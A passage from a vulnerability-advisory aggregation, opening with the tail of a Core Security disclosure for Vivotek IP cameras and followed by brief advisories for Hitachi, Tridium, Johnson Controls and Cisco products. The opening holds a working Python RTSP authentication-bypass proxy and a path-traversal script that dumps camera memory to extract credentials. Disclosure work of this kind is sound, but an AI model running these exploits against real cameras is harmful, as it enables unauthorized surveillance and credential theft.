print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ;
"[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ;
"/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received. 2013-03-11:
Core asks for a security manager to send a confidential report. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485). 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670). 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485. 2013-04-24:
Core tries to contact vendor for last time without any reply. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201207-0605 | No CVE | Hitachi JP1 Unknown Privilege Elevation Vulnerability in Multiple Products |
CVSS V2: - CVSS V3: - Severity: - |
Hitachi JP1 has security vulnerabilities in multiple products that allow malicious local users to elevate privileges. The problem exists in the security program management program, and no detailed vulnerability details are currently provided.
Local attackers can exploit this issue to gain escalated privileges. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Hitachi JP1 Products Unspecified Privilege Escalation Vulnerability
SECUNIA ADVISORY ID:
SA49907
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49907/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49907
RELEASE DATE:
2012-07-13
DISCUSS ADVISORY:
http://secunia.com/advisories/49907/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49907/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49907
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in multiple Hitachi JP1 products,
which can be exploited by malicious, local users to gain escalated
privileges.
The vulnerability is caused due to an unspecified error within the
setup package manager. No further details are currently available.
Please see the vendor's advisory for the list of affected products.
SOLUTION:
Apply patches (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Hitachi (Japanese):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/./vuls/HS12-020/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0105 | CVE-2012-4028 | Tridium Niagara AX Framework Security Bypass Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Tridium Niagara AX Framework does not properly store credential data, which allows context-dependent attackers to bypass intended access restrictions by using the stored information for authentication. A vulnerability exists in the Tridium Niagara AX Framework. The vulnerability stems from a failure to properly store credential data. TRIDIUM NiagaraAX is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. ----------------------------------------------------------------------
The new Secunia CSI 6.0 is now available in beta!
Seamless integration with your existing security solutions Sign-up to
become a Beta tester: http://secunia.com/csi6beta
----------------------------------------------------------------------
TITLE:
Niagara Framework Predictable Session Identifier Vulnerability
SECUNIA ADVISORY ID:
SA50288
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50288/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50288
RELEASE DATE:
2012-08-16
DISCUSS ADVISORY:
http://secunia.com/advisories/50288/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50288/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50288
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Niagara Framework, which can be
exploited by malicious people to hijack a user's session.
The vulnerability is caused due to predictable sessions identifiers
being used.
SOLUTION:
No official solution is currently available.
PROVIDED AND/OR DISCOVERED BY:
Billy Rios and Terry McCorkle via ICS-CERT.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-228-01.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0054 | CVE-2012-2607 | Johnson Controls Multiple Products Remote Command Execution Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The Johnson Controls CK721-A controller with firmware before SSM4388_03.1.0.14_BB allows remote attackers to perform arbitrary actions via crafted packets to TCP port 41014 (aka the download port). Johnson Controls CK721-A and P2000 products contain a remote command execution vulnerability which may allow an unauthenticated remote attacker to perform various tasks against the devices. Johnson Controls is a well-known self-control manufacturer in the United States. An unauthenticated attacker can send a specially crafted message to this port to close the door and change the configuration. The \"upload\" port (tcp/41013) of the P2000 (Pegasys) server is used for logging and alarm purposes. The server only receives any message sent to it by verifying the source IP. The attacker can send a specially crafted message to the port to provide false information. Access data to the server.
Successfully exploiting this issue may allow an attacker to execute arbitrary commands within the context of the vulnerable system
| VAR-201207-0104 | CVE-2012-4027 | Tridium Niagara AX Framework Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Tridium Niagara AX Framework allows remote attackers to read files outside of the intended images, nav, and px folders by leveraging incorrect permissions, as demonstrated by reading the config.bog file. The Niagara Framework is a unified, open, distributed platform that integrates the management of a wide variety of devices and systems. The Niagara Framework has an input validation vulnerability that allows an attacker to exploit a vulnerability for a directory traversal attack. The vulnerability is due to the fact that some of the unspecified input is missing validation before being used to read the file, and any file content can be obtained by submitting a malicious request. TRIDIUM NiagaraAX is prone to a directory-traversal vulnerability.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Niagara Framework Directory Traversal Vulnerability
SECUNIA ADVISORY ID:
SA49903
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49903/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49903
RELEASE DATE:
2012-07-16
DISCUSS ADVISORY:
http://secunia.com/advisories/49903/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49903/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49903
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Niagara Framework, which can be
exploited by malicious people to disclose system information. This can be exploited to disclose the contents of
arbitrary files via directory traversal sequences.
SOLUTION:
The vendor recommends to limit access to the affected systems.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Billy Rios and Terry McCorkle via ICS-CERT.
ORIGINAL ADVISORY:
https://www.tridium.com/galleries/briefings/NiagaraAX_Framework_Software_Security_Alert.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0176 | CVE-2012-3075 | Cisco TelePresence Immersive An arbitrary command execution vulnerability in endpoint devices |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Immersive Endpoint Devices before 1.7.4 allows remote authenticated users to execute arbitrary commands via a malformed request on TCP port 443, aka Bug ID CSCtn99724. Cisco TelePresence Immersive Endpoint is a video telepresence system. Also known as Bug ID CSCtn99724. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Cisco TelePresence Immersive Endpoint Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA49879
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49879/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49879
RELEASE DATE:
2012-07-12
DISCUSS ADVISORY:
http://secunia.com/advisories/49879/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49879/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49879
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco TelePresence
Immersive Endpoint devices, which can be exploited by malicious users
and malicious people to compromise a vulnerable system.
2) An error exists within the handling of Cisco Discovery Protocol
(CDP) packets.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120711-cts
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------